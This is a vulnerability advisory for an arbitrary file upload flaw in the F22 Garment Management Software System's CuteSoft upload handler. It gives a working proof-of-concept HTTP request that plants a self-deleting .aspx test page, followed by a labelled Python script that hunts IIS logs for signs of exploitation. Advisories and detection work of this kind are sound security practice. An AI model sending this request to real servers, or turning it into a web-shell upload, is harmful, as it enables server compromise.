F22 Garment Management Software System /CuteSoft_Client/UploadHandler.ashx File Upload Vulnerability

Date: 2024-11-01 | Affected software: F22 Garment Management Software System | PoC: public

Vulnerability Description

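The F22 Garment Management Software System is a comprehensive management product developed by 广州锦铭泰软件科技有限公司 (Guangzhou Jinmingtai Software Technology Co., Ltd.) specifically for the garment industry. The product is intended to help garment companies achieve comprehensive, efficient management and to improve production efficiency and business performance.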

PoC Code

POST /CuteSoft_Client/UploadHandler.ashx HTTP/1.1
Host: 
Accept-Encoding: gzip
Connection: keep-alive
Content-Length: 531
Content-Type: multipart/form-data; boundary=----------zvcfhuanbolhjqotcijzyeqmfgrsiu
Cookie: ASP.NET_SessionId=20xkbmjih5yqp4u5ldl0n13f
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/[REDACTED] Safari/537.36

------------zvcfhuanbolhjqotcijzyeqmfgrsiu
Content-Disposition: form-data; name="folder"

/upload/udplog
------------zvcfhuanbolhjqotcijzyeqmfgrsiu
Content-Disposition: form-data; name="Filedata"; filename="1.aspx"
Content-Type: application/octet-stream

 <%@Page Language="C#"%> <% Response.Write("aamwodfsgyaovsfmnslt"); System.IO.File.Delete(Request.PhysicalPath); %>
------------zvcfhuanbolhjqotcijzyeqmfgrsiu
Content-Disposition: form-data; name="Upload"

Submit Query
------------zvcfhuanbolhjqotcijzyeqmfgrsiu--
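
An added detection example (not part of the original advisory or the vendor's code): the test page uploaded in the PoC deletes itself on its first request, so a disk scan can miss it, while the IIS log still shows a POST to the handler followed by a script request from the same client. The code correlates the two in a W3C log; the `/upload/` root (taken from the PoC's folder field), the 10-minute window and the sample log lines are assumptions constructed for illustration.

```python
"""Hunt IIS W3C logs for an upload-handler POST followed by a script request."""
from datetime import datetime, timedelta

HANDLER = "/cutesoft_client/uploadhandler.ashx"   # endpoint named in the advisory
UPLOAD_ROOT = "/upload/"                          # assumption: from the PoC's folder field
SCRIPT_EXT = (".aspx", ".ashx", ".asmx", ".asp")  # extensions IIS executes server-side
WINDOW = timedelta(minutes=10)                    # assumption: correlation window

# Constructed sample log (documentation IP ranges), not from a real server.
SAMPLE_LOG = """\
#Fields: date time c-ip cs-method cs-uri-stem sc-status
2024-11-02 08:15:01 198.51.100.7 GET /Login.aspx 200
2024-11-02 08:15:40 203.0.113.9 POST /CuteSoft_Client/UploadHandler.ashx 200
2024-11-02 08:15:42 203.0.113.9 GET /upload/udplog/1.aspx 200
2024-11-02 08:15:45 203.0.113.9 GET /upload/udplog/1.aspx 404
2024-11-02 09:30:00 198.51.100.7 GET /upload/udplog/report.png 200
""".splitlines()

def parse_w3c(lines):
    """Yield one dict per request, keyed by the most recent #Fields header."""
    fields = []
    for line in lines:
        if line.startswith("#Fields:"):
            fields = line.split()[1:]
        elif line and not line.startswith("#") and fields:
            row = dict(zip(fields, line.split()))
            row["ts"] = datetime.strptime(
                row["date"] + " " + row["time"], "%Y-%m-%d %H:%M:%S")
            yield row

def hunt(lines, window=WINDOW):
    """Return (upload, follow_up) pairs: same client, script under UPLOAD_ROOT."""
    last_upload, hits = {}, []
    for r in parse_w3c(lines):
        stem, ip = r["cs-uri-stem"].lower(), r["c-ip"]
        if r["cs-method"] == "POST" and stem == HANDLER:
            last_upload[ip] = r                   # remember latest upload per client
        elif ip in last_upload and stem.startswith(UPLOAD_ROOT) \
                and stem.endswith(SCRIPT_EXT):
            up = last_upload[ip]
            if timedelta(0) <= r["ts"] - up["ts"] <= window:
                hits.append((up, r))
    return hits

if __name__ == "__main__":
    for up, hit in hunt(SAMPLE_LOG):
        # A 200 followed by 404 on the same path matches a self-deleting page.
        print(f'{hit["c-ip"]} upload@{up["ts"]} -> {hit["cs-method"]} '
              f'{hit["cs-uri-stem"]} {hit["sc-status"]}')
```

A 200 followed by a 404 on the same script path is consistent with the self-deleting page in the PoC; a script under the upload root that keeps returning 200 warrants immediate review of the file on disk.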
